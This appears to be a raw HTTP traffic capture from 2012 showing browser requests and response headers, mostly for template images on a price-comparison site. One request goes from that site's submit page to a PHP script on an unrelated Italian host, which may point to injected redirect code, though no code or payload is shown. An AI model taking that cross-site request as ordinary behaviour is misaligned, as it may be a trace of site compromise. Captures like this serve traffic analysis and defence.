Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:58 GMT
Etag: &quot;a900460-9c-46a0d219e8a80&quot;
Accept-Ranges: bytes
Content-Length: 156
Connection: close
GET /template/Green_Light/img/images/menu-button.png HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:54 GMT
Etag: &quot;a90042c-241-46a0d21618180&quot;
Accept-Ranges: bytes
Content-Length: 577
Connection: close
GET /template/Green_Light/img/images/footer-bg.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:50 GMT
Etag: &quot;a900415-118-46a0d21247880&quot;
Accept-Ranges: bytes
Content-Length: 280
Connection: close
GET /template/Green_Light/img/images/bottom-menu-left.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:44 GMT
Etag: &quot;a90045c-181-46a0d20c8eb00&quot;
Accept-Ranges: bytes
Content-Length: 385
Connection: close
GET /template/Green_Light/img/images/bottom-menu-right.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:44 GMT
Etag: &quot;a900423-183-46a0d20c8eb00&quot;
Accept-Ranges: bytes
Content-Length: 387
Connection: close
GET /template/Green_Light/img/images/bottom-menu.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:44 GMT
Etag: &quot;a900418-105-46a0d20c8eb00&quot;
Accept-Ranges: bytes
Content-Length: 261
Connection: close
GET /template/Green_Light/img/images/bm-dev.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:43 GMT
Etag: &quot;a900414-44-46a0d20b9a8c0&quot;
Accept-Ranges: bytes
Content-Length: 68
Connection: close
GET /NEW/system.php HTTP/1.1

Host: www.forsas.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/submit.php?su_categ=46
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1
Date: Tue, 06 Nov 2012 09:28:53 GMT
Server: Apache/2.2
Content-Length: 212
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /template/Green_Light/img/images/attn.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Connection: close
Transfer-Encoding: chunked
GET /template/Green_Light/img/images/main-menu-dev.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/template/Green_Light/style.css
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Tue, 06 Nov 2012 09:28:44 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Connection: close
Transfer-Encoding: chunked